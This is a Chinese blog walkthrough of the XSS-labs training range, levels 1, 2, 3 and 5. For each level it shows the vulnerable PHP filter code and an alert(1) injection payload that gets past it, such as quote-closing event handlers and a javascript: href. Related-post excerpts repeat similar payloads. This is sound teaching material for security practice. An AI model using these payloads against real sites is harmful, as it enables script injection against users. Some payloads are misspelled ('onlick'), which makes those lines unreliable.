XSS漏洞---XSS-labs通关教程

已于 2024-05-07 18:04:51 修改
阅读量207 收藏 1
点赞数 7
分类专栏: 网络安全攻击 文章标签: xss 前端
于 2024-05-07 18:03:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhoutong2323/article/details/138528008
版权

文章目录

Level-1

过滤源码:无

pyload:

name=<script>alert(1)</script>

Level-2

过滤源码:利用转译函数将特殊字符转译为实体字符

$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>

htmlspecialchars():将特殊字符"<"或“>"或单引号或双引号转换为 HTML 实体

pyload:利用转义函数仅对get参数生效的特点,利用引号闭合value同时注入点击事件

1” onlick="alert(1)

 Level-3 

过滤源码:利用转译函数将特殊字符转译为实体字符

$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>

 pyload:利用htmlspecialchars()函数未设置ENT_QUOTES不会对单引号过滤的特性

1' onlick='alert(1)

 

 Level-5

过滤源码:利用替换函数将get参数替换

ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>

pyload:利用href属性中可以执行JS代码的特性绕过防御

1"> <a href="javascript:alert(1)">aaa</a>

总结

北 染 星 辰
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xsslibs大详解
gankjk的博客
10-31 849
level1 我没问查看发现,他提交了一个name参数,并且值为test,长度为4. 我们直接在name参数插入代码测试:<script>alert(1)</script> 我们查看一下源码 echo "<h2 align=center>欢迎用户".$str."</h2>";这里没有过滤直接输出接收到的字符串,那么用户恶意输入,当然也会执行,所以构成了xss漏洞。 level2 我们直接插入代码试试<script>aler...
xss-labs 通关教程
SkyWT 的博客
07-05 1833
XSS 攻击历久弥新,目前 XSS 漏洞依然广泛存在。其核心在于找到注入点并通过 payload 让浏览器执行 js 代码。注入点不仅可以来源于用户提供的文本(请求参数或后端存储的字段),也可以是 Referer、UA、Cookie 等。通过<script>标签。通过元素的 onmouseover 属性。通过<img>的 onerror 属性,如。通过 URI,如。一般来说,使用 PHP 的函数能够防御很大一部分 XSS(注意过滤单引号)。许多字符过滤上的漏洞都是没有使用。
xsslabs第三关
weixin_63750160的博客
02-29 504
看到这关想到了第二关那我们先用第二关的思路搞一下。这是htmlspecialchars()并没有逃逸出来所以我们还是看一下源代码。根据源代码我们发现这是一个'闭合。
XSS-Libs通关详解
henghengzhao_的博客
10-24 1404
开局先看到了get参数,而且和图片上面显示的一模一样我们可以试试这里是不是可以进行xss注入修改get参数: 通关看见输入框就得暗自一笑,特别是正上面还有它的输出(不知道是不是,是不是试试就知道是不是了呗)反手一个 闹着玩呢,上面正常回显了,但是没执行,我们查看源码,看看是不是哪被过滤了源码如下: 眼尖的小伙伴已经看到了,回显位被过滤掉了,过滤了,具体是怎么过滤的呢htmlspecialchars()函数balabala这么多,总之我们理解一个意思即可:就是把< > ’ "
[ 靶场环境篇 ] XSS-labs 靶场环境搭建(特别详细)
qq_51577576的博客
12-10 1万+
想入门渗透行业呢光有理论基础是不够的,更重要的是实践经验。 接下来我会分享一些入门级靶场,从环境搭建一直到通关教程。 入门级靶场会分享:pikachu、DVWA、XSS-labs、sql-labs、upload-labs等内容。 上篇文章写到了 pikachu 靶场的搭建,本文写 XSS-lab 靶场环境的搭建。 目录 一、环境准备 1 搭建环境 2 下载链接 二、安装教程 1. 首先我们需要搭建好PHP study: 2. 下载 xss-labs 靶场源码 3.解压缩并放入如下..
xss-lab通关之路
黑白的博客
10-12 4983
xss-lab通关之路
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
XSS-labs通关(超详细)
wulanlin的博客
12-30 6997
1.第一关 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三关 ​ 用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看到使
xss-labs通关详解 Level 6-10
qq_41755084的博客
10-25 985
这一关整体上与第五关类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
xss-labs通关大合集
热门推荐
wo41ge的博客
07-26 3万+
xss-labs 文章所用的xss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs 然后开始通关 level1 仔细观察三处箭头,可以发现它是向服务器提交了一个name参数,值为“test”,从页面 回显来看,将neme参数的值显示在了页面上,并且显示了name参数值的字符长度 接下来,查看源码 从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间 那么 就很明显,这一关主要就是考察反射型xss 但是由于不
xss-labs带你深入理解xss(已更新1~16)
xhx836161547的博客
12-13 1042
为了记录学习过程的想法,写下这篇文章。关于xss-labs的文章有很多,有一些很优秀的讲的比较清楚,也有一些直接粘贴答案什么知识点也不提的,更有甚者复制他人文章作为自己的付费。这篇文章主要是更详细的去说明知识点,以及一些思路的来源,记录我的所思所想,希望能够帮到大家。
XSS-labs详解
最新发布
ytdd66的博客
03-23 2221
进入靶场点击图片,开始我们的XSS之旅!
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 5371
web靶场-xss-labs靶机平台的搭建和代码审计
web安全—XSS攻击(二)
Lemon's blog
04-28 536
练习了DVWA靶场中的XSS了解了一些原理和攻击方式,接下来就用在线XSS平台开始实战一番。 在线XSS平台地址 第一关肯定不会太难,就用最常用的攻击语句试试。 <script>alert(/hacker/)</script> 第二关 就先把这个最简单的攻击语句放上去看看 <script>alert(/hacker/)</script> 没...
如何用前端防御XSS及建立XSS报警机制(三)
匆匆那年的专栏
08-17 451
如何用前端防御XSS及建立XSS报警机制(三) 前言 大家可以去参考如何用前端防御XSS及建立XSS报警机制的前言,至于觉得前端XSS防御没必要那可能此篇文章的思路和你所认为的有所不同,可以认真看完后,再做评论。谢谢。 一、回顾 我这个项目叫做FECM,在之前的功能里,前端只做一件事。就是重写alert方法。接下来就没有了。当时的出发点,是当黑客在进行XSS的时候,会使用alert语法来进...
xss-labs详解(下)11-20
hxhxhxhxx的博客
08-05 916
xss-labs详解Level 11Level 12Level 13Level 14Level 15ng-includeonerrorLevel 16Level 17Level 18Level 19Level 20 Level 11 查看一波源代码,发现可能在这里存在xss 那么我们使用burp抓包,修改 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=
xss靶场练习(二)之xss小游戏
angry_program的博客
02-13 2783
前言 话说自从网络安全修正法推出, 不敢轻易动国内的网站, 平时就打打靶场, 本文记录练习之路。 xss小游戏在线地址:http://test.ctf8.com/ xss小游戏一共二十关。 为了方便, 我把项目copy在本地。 为了方便实战效果和理解, 本文采用先通关再展示源码的排版方式。 Leve-1 有一个参数name: 再看看name在html源...
XSS挑战赛--Writeup(共16题)
1stPeak's Blog
06-10 2237
XSS挑战赛--解题思路 Level-1 Level-2 Level-3 Level-4 Level-5 Level-6 Level-7 Level-8 Level-9 Level-10 Level-11 Level-12 Level-13 Level-14 Level-15 Level-16 Level-1 源码: <!DOCTYPE html><!--STATUS OK-...
XSS靶场实战
ppbgi的博客
04-06 950
XSSLIBS 一、 二、 进行注入后无法执行代码 进行元素查看发现未闭合: 进行闭合: 三、 发现输入的双引号转义了,于是尝试单引号: 发现实体化了,尝试事件注入: 发现事件没有实体化,尝试闭合: 四、 发现<>被替换了,尝试事件: 五、 输入语句后发现有下划线的添加, 尝试事件也无法执行 尝试img标签后,虽然闭合,但是没有执行语句; 尝试伪协议: 六、 尝试过script、img标签以及大小写变换之后,都无法执行,所以尝试伪协议
xss-labs通关
09-11
您好!对于 xss-labs 的通关,我可以提供一些基本的指导。首先,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过插入恶意脚本来利用网站上的用户。要通关 xss-labs,您需要了解并掌握以下内容: 1. XSS 攻击原理和类型:了解什么是 XSS 攻击以及其不同的类型,包括反射型、存储型和 DOM 型 XSS。 2. 漏洞挖掘和利用:学习如何发现和识别 XSS 漏洞,了解攻击者可能会利用这些漏洞进行的各种攻击。 3. 防御措施:了解如何预防 XSS 攻击,包括输入验证、输出编码、内容安全策略(CSP)等。 4. 工具使用:熟悉一些常用的漏洞扫描工具和渗透测试工具,例如 Burp Suite、OWASP Zap 等。 5. 实践演练:在合法授权的情况下,通过实例进行实践演练,即在模拟的环境中尝试利用 XSS 漏洞进行攻击或防御。 请注意,在进行任何渗透测试或漏洞利用活动时,务必遵守法律和道德规范,仅在合法授权下进行。希望这些信息对您有所帮助,祝您顺利通关 xss-labs!如有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北 染 星 辰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值